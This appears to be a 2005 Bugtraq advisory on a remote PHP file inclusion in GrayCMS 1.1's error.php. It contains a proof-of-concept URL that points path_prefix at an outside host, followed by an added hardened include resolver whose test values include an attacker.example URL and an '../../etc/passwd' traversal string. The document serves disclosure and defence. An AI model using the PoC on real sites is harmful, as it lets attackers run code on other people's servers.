GrayCMS php code injection
From: Kold (maggik_at_gala.net)
Date: 04/26/05
Date: 26 Apr 2005 11:45:32 -0000
To: bugtraq@securityfocus.com
Version: 1.1
Severity: High
Vendor: http://gcms.graymur.net/
Vulnerable code is in "code/error.php":
<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {
...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}
require $path_prefix.'code/blocks.php';
exit;
<----end---->
PoC:
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
mail me: maggik <at> gala <dot> net
icq: 3316667
greetz to: ghc, 0xdeadbabe, unl0ck & others
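
A hardened way to resolve the two `require` targets shown above, as an added example that is not part of the original advisory or of GrayCMS: the include root is fixed by the application and every target must resolve to a file inside it. `gcms_resolve_include()`, the temporary directory tree and `attacker.example` are constructed for illustration.

```php
<?php
// Added illustration, not GrayCMS code. gcms_resolve_include() is a hypothetical helper.
// In error.php the root would be fixed by the script itself, e.g. dirname(__DIR__),
// and never read from $_GET or any other request-controlled variable.

/** Return the absolute path of $relative under $root, or null if rejected. */
function gcms_resolve_include($relative, $root)
{
    // Reject anything carrying a scheme or wrapper (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    $base = realpath($root);
    $full = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $full === false) {
        return null; // root or target does not exist
    }
    // After ../ and symlinks are resolved, the target must still sit under the root.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Constructed demo tree standing in for the CMS install directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gcms_demo_' . getmypid();
mkdir($root . DIRECTORY_SEPARATOR . 'code', 0700, true);
file_put_contents($root . '/code/main.dat', "<?php // constructed sample\n");

$candidates = array(
    'code/main.dat',                          // legitimate include
    'http://attacker.example/code/main.dat',  // shape of the value in the PoC
    '../../etc/passwd',                       // traversal out of the root
);
foreach ($candidates as $candidate) {
    $path = gcms_resolve_include($candidate, $root);
    echo str_pad($candidate, 40), ' => ', ($path === null ? 'rejected' : 'allowed'), "\n";
}

// Remove the demo tree.
unlink($root . '/code/main.dat');
rmdir($root . '/code');
rmdir($root);
```

Independently of the code change, `allow_url_fopen = Off` (or `allow_url_include = Off` on PHP 5.2 and later) stops `require` from fetching URLs, and `register_globals = Off` stops request parameters from being turned into script variables automatically.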